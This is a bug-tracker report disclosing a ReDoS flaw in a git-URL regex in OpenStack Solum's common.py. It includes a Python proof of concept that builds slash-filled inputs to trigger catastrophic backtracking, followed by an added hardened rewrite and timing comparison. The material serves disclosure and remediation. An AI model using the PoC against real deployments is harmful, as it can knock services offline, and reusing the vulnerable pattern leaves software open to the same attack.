Redos in at common.py#L20

Bug #2047505 reported by lujiefsi
This bug affects 1 person
Affects: Solum
Status: New
Importance: Undecided
Assigned to: Unassigned
Milestone: (not set)

Bug Description

Please check this website (https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) for the basic concept of ReDoS.

The vulnerable regex is at https://github.com/openstack/solum/blob/42575ef1316983e4d48b89ecf9d8a71e899f18db/solum/api/handlers/common.py#L20

PoC is here:

```
import re
import datetime

# Pattern copied from solum/api/handlers/common.py#L20. The adjacent greedy
# groups (.+)(/|:/)(.+)(.+) can split the same input many ways, so a
# non-matching input forces the engine to try every split before failing.
pt = re.compile(r'^(http://|https://|git@)(.+)(/|:/)(.+)(.+)(\.git)')

def split(x):
  # A prefix the pattern accepts, followed by x slashes and no '.git' suffix,
  # so the match fails only after exhaustive backtracking.
  data = 'https://git' + '/' * x
  starttime = datetime.datetime.now()
  pt.search(data)
  endtime = datetime.datetime.now()
  # total_seconds() keeps the fractional part; .seconds rounds down to 0
  # for the short inputs.
  print("string length = " + str(x) + " time cost=" + str((endtime - starttime).total_seconds()) + " seconds")

split(3)
split(30)
split(300)
split(3000)
```
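As an added example (not part of the report and not the project's fix), the pattern quoted above is placed beside a hardened rewrite that parses the same kind of git URL without the backtracking blowup. The ambiguity in the original is that `(.+)(/|:/)(.+)(.+)` gives the engine roughly n³/6 ways to split a string of n slashes before `\.git` fails; the rewrite gives each quantified group a character class that excludes the delimiter that follows it, so neighbouring groups can never claim the same characters. The names `HARDENED`, `parse_git_url` and `probe` are assumptions made for this example.

```python
import re
import time

# Vulnerable pattern as quoted in the report (solum/api/handlers/common.py#L20).
VULNERABLE = re.compile(r'^(http://|https://|git@)(.+)(/|:/)(.+)(.+)(\.git)')

# Hardened replacement. Assumption: this is an illustrative rewrite for this
# page, not the project's patch. Each quantified group excludes the delimiter
# that follows it, so a failing input is rejected in a single left-to-right pass.
HARDENED = re.compile(
    r'^(https?://|git@)'   # scheme, or scp-style user@ prefix
    r'([^/:]+)'            # host: anything up to the first '/' or ':'
    r'(/|:/?)'             # '/' after a URL host, ':' or ':/' after git@host
    r'((?:[^/]+/)*)'       # intermediate path segments, each ending in '/'
    r'([^/]+?)\.git/?$'    # repository name followed by .git
)


def parse_git_url(url):
    """Return (host, path_prefix, repo) for a git URL, or None if it does not match."""
    m = HARDENED.match(url)
    if m is None:
        return None
    _, host, _, prefix, repo = m.groups()
    return host, prefix, repo


def probe(pattern, slashes):
    """Time one failing match of pattern against the PoC-shaped input.

    Returns (matched, elapsed_seconds). The input is constructed here: a prefix
    the pattern accepts, followed by `slashes` slashes and no '.git' suffix.
    """
    data = 'https://git' + '/' * slashes
    start = time.perf_counter()
    matched = pattern.search(data) is not None
    return matched, time.perf_counter() - start


if __name__ == '__main__':
    for n in (3, 30, 300, 3000):
        _, hardened_t = probe(HARDENED, n)
        _, vulnerable_t = probe(VULNERABLE, n)
        print(f'{n:5d} slashes: vulnerable {vulnerable_t:9.4f}s  hardened {hardened_t:9.6f}s')
    print(parse_git_url('https://github.com/openstack/solum.git'))
    print(parse_git_url('git@github.com:openstack/solum.git'))
```

Running the module shows the vulnerable pattern's time climbing steeply with the slash count while the hardened pattern stays in the microsecond range for every size; `parse_git_url` still recovers host, path prefix and repository name for both `https://` and scp-style `git@host:` URLs.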

lujiefsi (lujiefsi)
description: updated
lujiefsi (lujiefsi)
summary: - Redos in
- https://github.com/openstack/solum/blob/42575ef1316983e4d48b89ecf9d8a71e899f18db/solum/api/handlers/language_pack_handler.py#L104
+ Redos in at language_pack_handler.py#L104
description: updated
summary: - Redos in at language_pack_handler.py#L104
+ Redos in at common.py#L20
description: updated
lujiefsi (lujiefsi)
information type: Private Security → Public Security